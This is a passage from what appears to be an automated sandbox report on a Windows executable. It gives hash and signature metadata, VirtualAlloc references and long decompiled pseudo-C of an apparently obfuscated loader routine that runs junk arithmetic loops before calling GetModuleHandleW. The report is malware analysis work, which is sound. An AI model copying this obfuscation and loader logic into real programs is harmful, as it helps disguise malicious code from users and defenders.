      • Instruction ID: 8b4822f9e8370efb8aa716ab2bdff0f3c9155800fc7c75105fa7cf001df46ced
      • Opcode Fuzzy Hash: e401f4025b18fde4cedafd8461d3ecfecea5f060ef9850e24f80275889b77d95
      • Instruction Fuzzy Hash: 56E0EDB5A003209BCB10DFA8D8C5A5737D8AB08754F444AA6AD14EF386D375DD148BD5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027664D6
      Memory Dump Source
      • Source File: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Offset: 02766000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2766000_file.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction ID: 2c0b9a6af8080676fc99bd70a221201c8ca2f623e769095e5fcbedc7970ba9ba
      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction Fuzzy Hash: A0113F79A00208EFDB01DF98C989E99BBF5AF08350F458094F9489B361D375EA90DF80
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63,FFFFFFDC,00405936), ref: 00405663
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 8f9877d62318573364b680f58bdd96403b1a30c6e5fd2d7d74d0ea7d8677bd8a
      • Instruction ID: 3e16d2164f8d2a5e8943222f2ffc1f9b9339b7b612c7f5e044403cd305a8c0ed
      • Opcode Fuzzy Hash: 8f9877d62318573364b680f58bdd96403b1a30c6e5fd2d7d74d0ea7d8677bd8a
      • Instruction Fuzzy Hash: E2F0AFF2B023214FE7149F789D417467BD5F706354F10417EE909EBB9AE7B098018B84
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E0085E760(void* __ebx, void* __edi, void* __esi) {
      				struct HINSTANCE__* _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				signed int _v24;
      				signed int _v28;
      				signed int _v32;
      				signed int _v36;
      				signed int _v40;
      				signed int _v44;
      				signed int _v48;
      				intOrPtr _v52;
      				signed int _v56;
      				signed int _v60;
      				signed int _v64;
      				intOrPtr _v68;
      				signed int _v72;
      				signed int _v76;
      				intOrPtr _v80;
      				char _v81;
      				char _v82;
      				char _v83;
      				char _v84;
      				char _v85;
      				char _v86;
      				char _v87;
      				char _v88;
      				char _v89;
      				char _v90;
      				char _v91;
      				char _v92;
      				char _v93;
      				char _v94;
      				char _v95;
      				char _v96;
      				char _v97;
      				char _v98;
      				char _v99;
      				char _v100;
      				char _v101;
      				char _v102;
      				char _v103;
      				char _v104;
      				char _v105;
      				intOrPtr _v112;
      				char _v113;
      				char _v114;
      				char _v115;
      				intOrPtr _v120;
      				char _v121;
      				char _v122;
      				char _v123;
      				char _v124;
      				char _v125;
      				char _v126;
      				char _v127;
      				char _v128;
      				char _v129;
      				char _v130;
      				char _v131;
      				char _v132;
      				char _v133;
      				char _v134;
      				char _v135;
      				char _v136;
      				char _v137;
      				char _v138;
      				char _v139;
      				char _v140;
      				char _v141;
      				char _v142;
      				char _v148;
      				char _v149;
      				char _v150;
      				char _v151;
      				char _v152;
      				char _v153;
      				char _v154;
      				char _v155;
      				char _v156;
      				char _v157;
      				char _v158;
      				char _v159;
      				char _v160;
      				char _v161;
      				char _v162;
      				char _v163;
      				char _v168;
      				char _v169;
      				char _v170;
      				char _v171;
      				char _v204;
      				char _v328;
      				char _v344;
      				char _v368;
      				char _v376;
      				char _v412;
      				char _v416;
      				char _v420;
      				signed int _v424;
      				char _v432;
      				char _v440;
      				char _v448;
      				char _v456;
      				char _v468;
      				char _v480;
      				char _v492;
      				char _v504;
      				char _v520;
      				char _v524;
      				intOrPtr _v528;
      				intOrPtr _v532;
      				intOrPtr _v536;
      				intOrPtr _v540;
      				intOrPtr _v544;
      				intOrPtr _v548;
      				intOrPtr _v552;
      				intOrPtr _v556;
      				intOrPtr _v560;
      				intOrPtr _v564;
      				intOrPtr _v568;
      				char _v572;
      				char _v576;
      				char _v580;
      				intOrPtr _v584;
      				intOrPtr _v588;
      				intOrPtr _v592;
      				intOrPtr _v596;
      				intOrPtr _v600;
      				intOrPtr _v604;
      				char _v608;
      				char _v612;
      				intOrPtr _v616;
      				intOrPtr _v620;
      				char _v624;
      				char _v628;
      				intOrPtr _v632;
      				intOrPtr _v636;
      				intOrPtr _v640;
      				intOrPtr _v644;
      				intOrPtr _v648;
      				intOrPtr _v652;
      				intOrPtr _v656;
      				char _v660;
      				intOrPtr _v664;
      				intOrPtr _v668;
      				intOrPtr _v672;
      				intOrPtr _v676;
      				intOrPtr _v680;
      				intOrPtr _v684;
      				intOrPtr _v688;
      				intOrPtr _v692;
      				intOrPtr _v696;
      				intOrPtr _v700;
      				intOrPtr _v704;
      				char _v708;
      				char _v712;
      				intOrPtr _v716;
      				intOrPtr _v720;
      				intOrPtr _v724;
      				intOrPtr _v728;
      				intOrPtr _v732;
      				intOrPtr _v736;
      				intOrPtr _v740;
      				intOrPtr _v744;
      				intOrPtr _v748;
      				intOrPtr _v752;
      				intOrPtr _v756;
      				intOrPtr _v760;
      				intOrPtr _v764;
      				intOrPtr _v768;
      				intOrPtr _v772;
      				intOrPtr _v776;
      				intOrPtr _v780;
      				intOrPtr _v784;
      				intOrPtr _v788;
      				char _v792;
      				intOrPtr _v796;
      				intOrPtr _v800;
      				intOrPtr _v804;
      				intOrPtr _v808;
      				intOrPtr _v812;
      				intOrPtr _v816;
      				intOrPtr _v820;
      				intOrPtr _v824;
      				intOrPtr _v828;
      				intOrPtr _v832;
      				intOrPtr _v836;
      				intOrPtr _v840;
      				intOrPtr _v844;
      				intOrPtr _v848;
      				intOrPtr _v852;
      				intOrPtr _v856;
      				intOrPtr _v860;
      				intOrPtr _v864;
      				intOrPtr _v868;
      				char _v872;
      				intOrPtr _v876;
      				intOrPtr _v880;
      				intOrPtr _v884;
      				intOrPtr _v888;
      				intOrPtr _v892;
      				intOrPtr _v896;
      				intOrPtr _v900;
      				intOrPtr _v904;
      				intOrPtr _v908;
      				intOrPtr _v912;
      				intOrPtr _v916;
      				intOrPtr _v920;
      				intOrPtr _v924;
      				intOrPtr _v928;
      				intOrPtr _v932;
      				char _v936;
      				intOrPtr _v940;
      				intOrPtr _v944;
      				intOrPtr _v948;
      				intOrPtr _v952;
      				intOrPtr _v956;
      				intOrPtr _v960;
      				intOrPtr _v964;
      				intOrPtr _v968;
      				intOrPtr _v972;
      				intOrPtr _v976;
      				intOrPtr _v980;
      				intOrPtr _v984;
      				intOrPtr _v988;
      				intOrPtr _v992;
      				char _v996;
      				intOrPtr _v1000;
      				intOrPtr _v1004;
      				intOrPtr _v1008;
      				intOrPtr _v1012;
      				intOrPtr _v1016;
      				intOrPtr _v1020;
      				intOrPtr _v1024;
      				intOrPtr _v1028;
      				intOrPtr _v1032;
      				intOrPtr _v1036;
      				intOrPtr _v1040;
      				char _v1044;
      				char _v1048;
      				intOrPtr _v1052;
      				intOrPtr _v1056;
      				intOrPtr _v1060;
      				intOrPtr _v1064;
      				intOrPtr _v1068;
      				intOrPtr _v1072;
      				intOrPtr _v1076;
      				char _v1080;
      				intOrPtr _v1084;
      				intOrPtr _v1088;
      				intOrPtr _v1092;
      				intOrPtr _v1096;
      				intOrPtr _v1100;
      				intOrPtr _v1104;
      				char _v1108;
      				char _v1112;
      				char _v1116;
      				char _v1132;
      				char _v1148;
      				char _v1164;
      				char _v1184;
      				char _v1204;
      				char _v1224;
      				char _v1244;
      				char _v1268;
      				char _v1292;
      				char _v1316;
      				char _v1340;
      				char _v1368;
      				char _v1396;
      				char _v1424;
      				char _v1452;
      				char _v1456;
      				char _v1460;
      				char _v1464;
      				intOrPtr _v1468;
      				intOrPtr _v1472;
      				intOrPtr _v1476;
      				char _v1480;
      				intOrPtr _v1484;
      				intOrPtr _v1488;
      				intOrPtr _v1492;
      				intOrPtr _v1496;
      				intOrPtr _v1500;
      				intOrPtr _v1504;
      				intOrPtr _v1508;
      				intOrPtr _v1512;
      				intOrPtr _v1516;
      				intOrPtr _v1520;
      				intOrPtr _v1524;
      				intOrPtr _v1528;
      				intOrPtr _v1532;
      				char _v1536;
      				intOrPtr _v1540;
      				intOrPtr _v1544;
      				intOrPtr _v1548;
      				intOrPtr _v1552;
      				intOrPtr _v1556;
      				intOrPtr _v1560;
      				intOrPtr _v1564;
      				intOrPtr _v1568;
      				intOrPtr _v1572;
      				intOrPtr _v1576;
      				intOrPtr _v1580;
      				intOrPtr _v1584;
      				intOrPtr _v1588;
      				intOrPtr _v1592;
      				intOrPtr _v1596;
      				intOrPtr _v1600;
      				intOrPtr _v1604;
      				char _v1608;
      				intOrPtr _v1612;
      				intOrPtr _v1616;
      				intOrPtr _v1620;
      				intOrPtr _v1624;
      				intOrPtr _v1628;
      				intOrPtr _v1632;
      				intOrPtr _v1636;
      				intOrPtr _v1640;
      				intOrPtr _v1644;
      				intOrPtr _v1648;
      				intOrPtr _v1652;
      				intOrPtr _v1656;
      				intOrPtr _v1660;
      				intOrPtr _v1664;
      				char _v1668;
      				intOrPtr _v1672;
      				intOrPtr _v1676;
      				intOrPtr _v1680;
      				intOrPtr _v1684;
      				intOrPtr _v1688;
      				intOrPtr _v1692;
      				intOrPtr _v1696;
      				intOrPtr _v1700;
      				intOrPtr _v1704;
      				intOrPtr _v1708;
      				intOrPtr _v1712;
      				intOrPtr _v1716;
      				intOrPtr _v1720;
      				intOrPtr _v1724;
      				intOrPtr _v1728;
      				char _v1732;
      				char _v1736;
      				char _v1740;
      				intOrPtr _v1744;
      				intOrPtr _v1748;
      				intOrPtr _v1752;
      				intOrPtr _v1756;
      				intOrPtr _v1760;
      				intOrPtr _v1764;
      				intOrPtr _v1768;
      				intOrPtr _v1772;
      				intOrPtr _v1776;
      				intOrPtr _v1780;
      				intOrPtr _v1784;
      				intOrPtr _v1788;
      				intOrPtr _v1792;
      				intOrPtr _v1796;
      				intOrPtr _v1800;
      				intOrPtr _v1804;
      				intOrPtr _v1808;
      				intOrPtr _v1812;
      				char _v1816;
      				char _v1820;
      				intOrPtr _v1824;
      				intOrPtr _v1828;
      				intOrPtr _v1832;
      				intOrPtr _v1836;
      				intOrPtr _v1840;
      				intOrPtr _v1844;
      				intOrPtr _v1848;
      				intOrPtr _v1852;
      				intOrPtr _v1856;
      				intOrPtr _v1860;
      				intOrPtr _v1864;
      				intOrPtr _v1868;
      				intOrPtr _v1872;
      				intOrPtr _v1876;
      				intOrPtr _v1880;
      				intOrPtr _v1884;
      				intOrPtr _v1888;
      				intOrPtr _v1892;
      				intOrPtr _v1896;
      				intOrPtr _v1900;
      				char _v1904;
      				char _v1908;
      				intOrPtr _v1912;
      				intOrPtr _v1916;
      				intOrPtr _v1920;
      				intOrPtr _v1924;
      				intOrPtr _v1928;
      				intOrPtr _v1932;
      				char _v1936;
      				char _v1940;
      				intOrPtr _v1944;
      				intOrPtr _v1948;
      				intOrPtr _v1952;
      				intOrPtr _v1956;
      				intOrPtr _v1960;
      				intOrPtr _v1964;
      				intOrPtr _v1968;
      				intOrPtr _v1972;
      				intOrPtr _v1976;
      				intOrPtr _v1980;
      				intOrPtr _v1984;
      				intOrPtr _v1988;
      				intOrPtr _v1992;
      				intOrPtr _v1996;
      				intOrPtr _v2000;
      				intOrPtr _v2004;
      				intOrPtr _v2008;
      				intOrPtr _v2012;
      				intOrPtr _v2016;
      				intOrPtr _v2020;
      				intOrPtr _v2024;
      				intOrPtr _v2028;
      				intOrPtr _v2032;
      				intOrPtr _v2036;
      				intOrPtr _v2040;
      				intOrPtr _v2044;
      				intOrPtr _v2048;
      				intOrPtr _v2052;
      				intOrPtr _v2056;
      				intOrPtr _v2060;
      				intOrPtr _v2064;
      				intOrPtr _v2068;
      				intOrPtr _v2072;
      				char _v2076;
      				char _v2080;
      				intOrPtr _v2084;
      				intOrPtr _v2088;
      				intOrPtr _v2092;
      				char _v2096;
      				char _v2100;
      				char _v2212;
      				char _v2528;
      				char _v2532;
      				char _v2580;
      				char _v2612;
      				char _v2640;
      				char _v2988;
      				char _v3016;
      				char _v3036;
      				char _v3396;
      				char _v3456;
      				char _v3468;
      				char _v3792;
      				char _v3828;
      				char _v3844;
      				char _v4172;
      				char _v4176;
      				char _v4212;
      				char _v4604;
      				char _v4624;
      				char _v4628;
      				char _v4852;
      				char _v4856;
      				char _v4900;
      				char _v4980;
      				char _v4984;
      				char _v5012;
      				char _v5316;
      				char _v5320;
      				char _v5408;
      				intOrPtr _t1874;
      				signed int _t1892;
      				intOrPtr* _t1898;
      				intOrPtr* _t1903;
      				intOrPtr* _t1908;
      				intOrPtr* _t1913;
      				intOrPtr _t1991;
      				signed int _t1993;
      				intOrPtr _t1994;
      				signed int _t2000;
      				signed int _t2004;
      				signed int _t2009;
      				intOrPtr _t2010;
      				signed int _t2012;
      				signed int _t2014;
      				signed int _t2015;
      				char* _t2016;
      				char* _t2019;
      				char* _t2024;
      				char* _t2033;
      				char* _t2038;
      				char* _t2043;
      				signed int _t2048;
      				signed int _t2155;
      				intOrPtr _t2156;
      				signed int _t2157;
      				signed int _t2158;
      				signed int _t2160;
      				signed int _t2162;
      				signed int _t2163;
      				intOrPtr _t2168;
      				signed int _t2176;
      				signed int _t2179;
      				signed int _t2181;
      				intOrPtr _t2183;
      				signed int _t2190;
      				signed int _t2192;
      				intOrPtr _t2194;
      				signed int _t2197;
      				signed int _t2198;
      				signed int _t2199;
      				intOrPtr _t2201;
      				signed int _t2203;
      				intOrPtr _t2204;
      				intOrPtr _t2205;
      				intOrPtr _t2208;
      				intOrPtr _t2210;
      				intOrPtr _t2213;
      				signed int _t2215;
      				intOrPtr _t2217;
      				intOrPtr _t2219;
      				signed int _t2223;
      				signed int _t2229;
      				signed int _t2237;
      				signed int _t2239;
      				intOrPtr _t2241;
      				signed int _t2242;
      				intOrPtr* _t2252;
      				intOrPtr* _t2257;
      				intOrPtr* _t2262;
      				intOrPtr* _t2267;
      				intOrPtr* _t2334;
      				intOrPtr* _t2339;
      				intOrPtr* _t2344;
      				intOrPtr* _t2394;
      				intOrPtr* _t2399;
      				intOrPtr* _t2404;
      				signed int _t2451;
      				signed int _t2453;
      				signed int _t2455;
      				signed int _t2456;
      				signed int _t2457;
      				signed int _t2458;
      				signed int _t2460;
      				signed int _t2462;
      				signed int _t2466;
      				signed int _t2467;
      				signed int _t2469;
      				signed int _t2475;
      				intOrPtr* _t2481;
      				intOrPtr* _t2486;
      				intOrPtr* _t2491;
      				signed int _t2539;
      				intOrPtr* _t2543;
      				intOrPtr* _t2548;
      				intOrPtr* _t2553;
      				intOrPtr* _t2592;
      				intOrPtr* _t2597;
      				intOrPtr* _t2632;
      				intOrPtr* _t2637;
      				intOrPtr* _t2642;
      				intOrPtr _t2687;
      				intOrPtr* _t2695;
      				intOrPtr* _t2700;
      				intOrPtr* _t2705;
      				signed int _t2745;
      				intOrPtr _t2748;
      				signed int _t2749;
      				signed int _t2751;
      				intOrPtr* _t2753;
      				intOrPtr* _t2758;
      				intOrPtr* _t2763;
      				intOrPtr* _t2768;
      				signed int _t2814;
      				signed int _t2815;
      				signed int _t2818;
      				signed int _t2819;
      				signed int _t2820;
      				intOrPtr* _t2825;
      				intOrPtr* _t2830;
      				intOrPtr* _t2835;
      				intOrPtr _t2876;
      				intOrPtr* _t2885;
      				intOrPtr* _t2890;
      				intOrPtr* _t2895;
      				intOrPtr* _t2938;
      				intOrPtr* _t2943;
      				intOrPtr* _t2948;
      				intOrPtr* _t2953;
      				intOrPtr* _t2958;
      				intOrPtr* _t3012;
      				intOrPtr* _t3017;
      				intOrPtr* _t3022;
      				intOrPtr* _t3027;
      				intOrPtr* _t3032;
      				intOrPtr* _t3037;
      				intOrPtr* _t3105;
      				intOrPtr* _t3110;
      				intOrPtr* _t3115;
      				intOrPtr* _t3120;
      				intOrPtr* _t3125;
      				intOrPtr* _t3130;
      				intOrPtr* _t3151;
      				intOrPtr* _t3156;
      				intOrPtr* _t3161;
      				intOrPtr* _t3166;
      				intOrPtr* _t3194;
      				intOrPtr* _t3199;
      				intOrPtr* _t3204;
      				intOrPtr* _t3246;
      				intOrPtr* _t3251;
      				intOrPtr* _t3256;
      				intOrPtr* _t3275;
      				intOrPtr* _t3280;
      				intOrPtr* _t3285;
      				signed int _t3318;
      				signed int _t3320;
      				signed int _t3329;
      				signed int _t3331;
      				signed int _t3333;
      				intOrPtr _t3334;
      				signed int _t3335;
      				signed int _t3336;
      				signed int _t3337;
      				intOrPtr _t3338;
      				intOrPtr _t3340;
      				intOrPtr _t3343;
      				signed int _t3345;
      				signed int _t3348;
      				signed int _t3350;
      				intOrPtr _t3352;
      				intOrPtr _t3360;
      				signed int _t3362;
      				signed int _t3364;
      				signed int _t3366;
      				intOrPtr _t3369;
      				signed int _t3371;
      				signed int _t3374;
      				signed int _t3375;
      				signed int _t3377;
      				signed int _t3378;
      				intOrPtr _t3379;
      				signed int _t3392;
      				signed int _t3394;
      				signed int _t3396;
      				intOrPtr _t3398;
      				signed int _t3399;
      				signed int _t3400;
      				signed int _t3404;
      				signed int _t3407;
      				signed int _t3408;
      				char* _t3420;
      				char* _t3423;
      				char* _t3428;
      				char* _t3433;
      				char* _t3438;
      				char* _t3443;
      				char* _t3448;
      				char* _t3453;
      				char* _t3462;
      				char* _t3467;
      				char* _t3472;
      				char* _t3493;
      				char* _t3496;
      				char* _t3501;
      				char* _t3510;
      				char* _t3515;
      				char* _t3524;
      				char* _t3529;
      				char* _t3534;
      				char* _t3543;
      				char* _t3548;
      				char* _t3553;
      				char* _t3558;
      				char* _t3567;
      				char* _t3572;
      				char* _t3577;
      				char* _t3582;
      				char* _t3587;
      				char* _t3592;
      				char* _t3597;
      				char* _t3602;
      				char* _t3607;
      				char* _t3616;
      				intOrPtr _t3660;
      				signed int _t3663;
      				signed int _t3666;
      				signed int _t3668;
      				signed int _t3670;
      				signed int _t3672;
      				signed int _t3674;
      				intOrPtr _t3675;
      				signed int _t3677;
      				intOrPtr _t3679;
      				signed int _t3681;
      				signed int _t3683;
      				signed int _t3685;
      				signed int _t3691;
      				signed int _t3693;
      				intOrPtr _t3695;
      				signed int _t3735;
      				signed int _t3737;
      				intOrPtr _t3739;
      				signed int _t3751;
      				char* _t3776;
      				char* _t3779;
      				char* _t3784;
      				char* _t3789;
      				char* _t3794;
      				char* _t3799;
      				char* _t3804;
      				char* _t3809;
      				char* _t3818;
      				char* _t3823;
      				char* _t3828;
      				char* _t3865;
      				char* _t3868;
      				char* _t3873;
      				char* _t3878;
      				char* _t3883;
      				char* _t3892;
      				char* _t3897;
      				char* _t3902;
      				void* _t3911;
      				intOrPtr _t4323;
      				intOrPtr* _t4326;
      				intOrPtr* _t4329;
      				intOrPtr* _t4333;
      				intOrPtr* _t4339;
      				intOrPtr* _t4343;
      				intOrPtr* _t4347;
      				intOrPtr _t4351;
      				signed int _t4649;
      				intOrPtr _t4842;
      				intOrPtr _t4896;
      				intOrPtr* _t4908;
      				intOrPtr* _t4911;
      				intOrPtr* _t4915;
      				intOrPtr* _t4919;
      				intOrPtr* _t4923;
      				intOrPtr* _t4927;
      				intOrPtr* _t4931;
      				intOrPtr* _t4935;
      				intOrPtr* _t4941;
      				intOrPtr* _t4945;
      				intOrPtr* _t4949;
      				intOrPtr* _t4961;
      				intOrPtr* _t4964;
      				intOrPtr* _t4968;
      				intOrPtr* _t4974;
      				intOrPtr* _t4978;
      				intOrPtr* _t4984;
      				intOrPtr* _t4988;
      				intOrPtr* _t4992;
      				intOrPtr* _t4998;
      				intOrPtr* _t5002;
      				intOrPtr* _t5006;
      				intOrPtr* _t5010;
      				intOrPtr* _t5016;
      				intOrPtr* _t5020;
      				intOrPtr* _t5024;
      				intOrPtr* _t5028;
      				intOrPtr* _t5032;
      				intOrPtr* _t5036;
      				intOrPtr* _t5040;
      				intOrPtr* _t5044;
      				intOrPtr* _t5048;
      				intOrPtr* _t5054;
      				intOrPtr* _t5097;
      				intOrPtr* _t5100;
      				intOrPtr* _t5104;
      				intOrPtr* _t5108;
      				intOrPtr* _t5112;
      				intOrPtr* _t5116;
      				intOrPtr* _t5120;
      				intOrPtr* _t5124;
      				intOrPtr* _t5130;
      				intOrPtr* _t5134;
      				intOrPtr* _t5138;
      				intOrPtr* _t5154;
      				intOrPtr* _t5157;
      				intOrPtr* _t5161;
      				intOrPtr* _t5165;
      				intOrPtr* _t5169;
      				intOrPtr* _t5175;
      				intOrPtr* _t5179;
      				intOrPtr* _t5183;
      				intOrPtr _t5190;
      				intOrPtr _t5191;
      				void* _t5247;
      				void* _t5305;
      				void* _t5307;
      				char _t5349;
      				char _t5355;
      
      				_t5188 = __esi;
      				_t5187 = __edi;
      				_t3910 = __ebx;
      				_t5190 = _t5191;
      				_t3911 = 0x2a3;
      				goto L1;
      				L17:
      				_push(_t5190);
      				_push(0x86ec50);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t5191;
      				E0040A0C0( &_v12, _v16);
      				_t1892 =  *0x8a9b78; // 0x12d6c
      				 *0x8a9b18 = _t1892;
      				E0040A0C0( &_v12, L"mscat32.dll");
      				if(_v56 > _v24) {
      					_v72 = 0;
      					_v424 = _v68 + 0x6c;
      					asm("fild dword [ebp-0x1a4]");
      					_v24 = E004076E8();
      					asm("fild dword [ebp-0x1c]");
      					_v28 = E004076F4();
      					asm("fild dword [ebp-0x34]");
      					_v40 = E004076E8();
      					 *0x8a9b18 =  *0x8a9ba4 * 0x33;
      					 *0x8a9b78 =  *0x8a9ad8 * 0xc9;
      					_t3751 =  *0x8a9a34; // 0xe22aa3e4
      					 *0x8a9a44 = _t3751 + 0xfa;
      				}
      				 *0x8a9b88 = 0;
      				E0085E4BC();
      				_t1898 =  *0x8a9f14; // 0x8b0922
      				_v81 =  *_t1898;
      				if(_v81 + 0x9f - 0x1a < 0) {
      					_v81 = _v81 - 0x20;
      				}
      				_t1903 =  *0x8aa080; // 0x8b0916
      				_v82 =  *_t1903;
      				if(_v82 + 0x9f - 0x1a < 0) {
      					_v82 = _v82 - 0x20;
      				}
      				_t1908 =  *0x8a9ce4; // 0x8b0912
      				_v83 =  *_t1908;
      				if(_v83 + 0x9f - 0x1a < 0) {
      					_v83 = _v83 - 0x20;
      				}
      				_t1913 =  *0x8a9cf4; // 0x8b0911
      				_v84 =  *_t1913;
      				if(_v84 + 0x9f - 0x1a < 0) {
      					_v84 = _v84 - 0x20;
      				}
      				E0040A3C0(0);
      				_push(_v528);
      				E0040A3C0(0);
      				_push(_v532);
      				E0040A3C0(0);
      				_push(_v536);
      				E0040A3C0(0);
      				_push(_v540);
      				E0040A3C0(0);
      				_push(_v544);
      				E0040A3C0(0);
      				_push(_v548);
      				E0040A3C0(0);
      				_push(_v552);
      				E0040A3C0(0);
      				_push(_v556);
      				E0040A3C0(0);
      				_push(_v560);
      				E0040A3C0(0);
      				_push(_v564);
      				E0040A3C0(0);
      				_push(_v568);
      				E0040A3C0(0);
      				E0040A494( &_v524, _t3910, 0xc, _t5187, _t5188);
      				E0040A9E8( &_v12, _v524, _v572);
      				E0040A950();
      				_push(_v584);
      				E0040A950();
      				_push(_v588);
      				E0040A950();
      				_push(_v592);
      				E0040A950();
      				_push(_v596);
      				E0040A950();
      				_push(_v600);
      				E0040A950();
      				_push(_v604);
      				E00422C7C(3,  &_v608);
      				_push(_v608);
      				E00422C7C(2,  &_v612);
      				_push(_v612);
      				_push(0x86f4dc);
      				E0040A950();
      				_push(_v616);
      				E0040A950();
      				_push(_v620);
      				E0040A950();
      				_push(_v624);
      				E0040AC04( &_v580, _t3910, 0xc, _t5187, _t5188);
      				E0040AA1C( &_v576, _v580);
      				_v8 = GetModuleHandleW(E0040A71C(_v576));
      				_v72 = 0;
      				do {
      					E0040A0C0( &_v12, _v20);
      					_v72 = _v72 + 1;
      				} while (_v72 != 5);
      				_v36 = 0;
      				E0085E4BC();
      				_v68 = 0;
      				do {
      					E0040A0C0( &_v12, _v12);
      					_v68 = _v68 + 1;
      				} while (_v68 != 0xc);
      				_v60 = 0;
      				while(_v60 < 0xd) {
      					_v60 = _v60 + 1;
      					E0040A0C0( &_v12, _v16);
      					_v64 = 0;
      					while(_v64 < 0xc) {
      						_v64 = _v64 + 1;
      						_v76 = _v24 + _v40;
      						_v32 = 0x9c - _v56;
      						_t3735 =  *0x8a9a9c; // 0xa3011753
      						 *0x8a9ae4 = _t3735 *  *0x8a9a68;
      						_t3737 =  *0x8a9b24; // 0xfbe6de1a
      						 *0x8a9b5c = _t3737 + 4;
      						_t3739 =  *0x8a9ac4; // 0x1cd03eb3
      						_v424 = _t3739 + 4;
      						asm("fild dword [ebp-0x1a4]");
      						 *0x8a9a68 = E004076F4();
      						 *0x8a9b14 =  *0x8a9ab4 * 0xc1;
      					}
      				}
      				E0040A0C0( &_v12, _v12);
      				 *0x8a9af0 = 0;
      				E0085E4BC();
      				if(_v8 == 0) {
      					E0040A0C0( &_v12, _v12);
      					_v72 = 0;
      					_t1991 =  *0x8a9b3c; // 0x4d52f553
      					 *0x8a9b3c = E00407278(_t1991);
      					_t1993 =  *0x8a9a50; // 0x3408bc9
      					 *0x8a9b74 = _t1993;
      					_t1994 =  *0x8a9b3c; // 0x4d52f553
      					__eflags = _t1994 -  *0x8a9b74; // 0xbc98d45f
      					if(__eflags < 0) {
      						_v24 = _v32 + 0xd;
      						asm("fild dword [ebp-0x28]");
      						_v40 = E004076F4();
      						_v424 = _v28 + 0x98;
      						asm("fild dword [ebp-0x1a4]");
      						_v68 = E004076E8();
      						_t2237 =  *0x8a9a50; // 0x3408bc9
      						 *0x8a9b24 = _t2237 + 0x3a;
      						_t2239 =  *0x8a9a3c; // 0x5d776cb8
      						 *0x8a9ba8 = _t2239 +  *0x8a9b90;
      						_t2241 =  *0x8a9b00; // 0xf8c6059a
      						_t2242 = _t2241 -  *0x8a99e4;
      						__eflags = _t2242;
      						 *0x8a9ae0 = _t2242;
      					}
      					E0040A0C0( &_v12, _v16);
      					 *0x8a9b60 =  *0x8a9a50 * 0x89;
      					 *0x8a9ae4 = 0;
      					E0085E4BC();
      					_t2000 =  *0x8a9b84; // 0xfcfc377e
      					 *0x8a9b68 = _t2000 + 0x2b;
      					 *0x8a9ac8 = 0;
      					E0085E4BC();
      					_t2004 =  *0x8a9a68; // 0x3662937a
      					 *0x8a9b08 = _t2004;
      					_pop(_t4323);
      					 *[fs:eax] = _t4323;
      					_v48 = _v40 * _v36;
      					_v64 = 0;
      					__eflags = _v64 - 3;
      					if(_v64 < 3) {
      						_v64 = _v64 + 1;
      						__eflags = 0;
      						_v68 = 0;
      						do {
      							_v424 = _v52 + 0x73;
      							asm("fild dword [ebp-0x1a4]");
      							_v76 = E004076E8();
      							_v32 = 0xfa - _v24;
      							_t2176 =  *0x8a9b44; // 0x892c9cf8
      							 *0x8a9adc = _t2176 + _t2176 * 4 + (_t2176 + _t2176 * 4) * 4;
      							_t2179 =  *0x8a9ba8; // 0x50bf15f2
      							 *0x8a9ba0 = _t2179 *  *0x8a9a68;
      							_t2181 =  *0x8a9a3c; // 0x5d776cb8
      							 *0x8a9ae8 = _t2181 +  *0x8a9ba8;
      							_t2183 =  *0x8a9af4; // 0xc0b2beda
      							_v424 = _t2183 + 0xa1;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9a58 = E004076E8();
      							_v68 = _v68 + 1;
      							__eflags = _v68 - 0xc;
      						} while (_v68 != 0xc);
      						E0040ACB4(_v20, _v12);
      						if(__eflags != 0) {
      							 *0x8a9b90 =  *0x8a9b48 * 0xc2;
      							 *0x8a9ab8 =  *0x8a9aa4 * 0x57;
      							_t2190 =  *0x8a9a50; // 0x3408bc9
      							 *0x8a9b58 = _t2190 + 0x86;
      							_t2192 =  *0x8a9b14; // 0xfbe6deb5
      							 *0x8a9a84 = _t2192 - 0x81;
      							_t2194 =  *0x8a9af4; // 0xc0b2beda
      							_v424 = _t2194 + 0x4a;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9b28 = E004076E8();
      							_t2197 =  *0x8a9ba4; // 0xfcfc3737
      							_t2198 = _t2197 + 4;
      							__eflags = _t2198;
      							 *0x8a9a3c = _t2198;
      						} else {
      							_t2219 =  *0x8a9b30; // 0x60792cb9
      							_v424 = _t2219 + 4;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9a88 = E004076F4();
      							 *0x8a9b28 =  *0x8a9b20 * 0xe4;
      							_t2223 =  *0x8a9b84; // 0xfcfc377e
      							 *0x8a9b98 = _t2223 +  *0x8a9ae8;
      							 *0x8a9af0 = 0xe -  *0x8a9b70;
      							 *0x8a9b98 = 0xa3 -  *0x8a9adc;
      							_t2229 =  *0x8a9b18; // 0x194
      							 *0x8a9a94 = _t2229 +  *0x8a9a64;
      						}
      						_t2199 =  *0x8a9b48; // 0xaaba2c
      						 *0x8a9a44 = _t2199 -  *0x8a9a54;
